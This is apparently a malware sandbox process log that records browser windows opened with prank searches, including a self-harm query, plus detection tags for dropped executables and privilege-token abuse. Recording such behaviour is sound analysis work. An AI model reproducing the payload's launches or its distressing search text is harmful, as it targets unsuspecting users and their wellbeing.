"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,856424669554753701,17206725217765025245,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
4⤵
PID:7444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,856424669554753701,17206725217765025245,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
4⤵
PID:7984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,856424669554753701,17206725217765025245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
4⤵
PID:2188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,856424669554753701,17206725217765025245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
4⤵
PID:6368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,856424669554753701,17206725217765025245,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
4⤵
PID:5668

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,856424669554753701,17206725217765025245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
4⤵
PID:4400

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,856424669554753701,17206725217765025245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
4⤵
PID:6592

C:\Windows\SysWOW64\calc.exe
"C:\Windows\System32\calc.exe"
3⤵
PID:2256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://play.clubpenguin.com/
3⤵
PID:8148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffa62b346f8,0x7ffa62b34708,0x7ffa62b34718
4⤵
PID:8184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,17225954195825722058,7368545859605875131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
4⤵
PID:5112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,17225954195825722058,7368545859605875131,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
4⤵
PID:6380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,17225954195825722058,7368545859605875131,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
4⤵
PID:4864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,17225954195825722058,7368545859605875131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
4⤵
PID:3496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,17225954195825722058,7368545859605875131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
4⤵
PID:6564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=virus.exe
3⤵
PID:7120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa62b346f8,0x7ffa62b34708,0x7ffa62b34718
4⤵
PID:7708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
4⤵
PID:7692

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
4⤵
PID:7180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:8
4⤵
PID:6336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
4⤵
PID:6980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
4⤵
PID:7012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
4⤵
PID:7884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2884 /prefetch:1
4⤵
PID:1928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
4⤵
PID:5600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
4⤵
PID:7448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
4⤵
PID:2304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
4⤵
PID:7520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
4⤵
PID:7016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
4⤵
PID:532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
4⤵
PID:5428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
4⤵
PID:7576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1
4⤵
PID:7584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
4⤵
PID:6164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:5448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
4⤵
PID:5352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
4⤵
PID:6480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
4⤵
PID:5052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7196 /prefetch:1
4⤵
PID:4360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7180 /prefetch:1
4⤵
PID:7524

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3532 /prefetch:8
4⤵
PID:4416

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3532 /prefetch:8
4⤵
PID:3640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7796 /prefetch:1
4⤵
PID:6176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7840 /prefetch:1
4⤵
PID:5452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:1
4⤵
PID:6184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7892 /prefetch:1
4⤵
PID:8104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7500 /prefetch:1
4⤵
PID:4888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
4⤵
PID:420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:1
4⤵
PID:7768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
4⤵
PID:7480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
4⤵
PID:6240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
4⤵
PID:8092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,1382707932883017599,13369156888183809904,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=8052 /prefetch:2
4⤵
PID:7952

C:\Windows\SysWOW64\explorer.exe
"C:\Windows\System32\explorer.exe"
3⤵
PID:6440

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
3⤵
PID:7892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=bonzi+buddy+download+free
3⤵
PID:1920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa62b346f8,0x7ffa62b34708,0x7ffa62b34718
4⤵
PID:3592

C:\Windows\SysWOW64\explorer.exe
"C:\Windows\System32\explorer.exe"
3⤵
PID:7416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=best+way+to+kill+yourself
3⤵
PID:7884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa62b346f8,0x7ffa62b34708,0x7ffa62b34718
4⤵
PID:7696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=half+life+3+release+date
3⤵
PID:6040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa62b346f8,0x7ffa62b34708,0x7ffa62b34718
4⤵
PID:7828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=minecraft+hax+download+no+virus
3⤵
PID:4344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0xf8,0x134,0x7ffa62b346f8,0x7ffa62b34708,0x7ffa62b34718
4⤵
PID:2756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
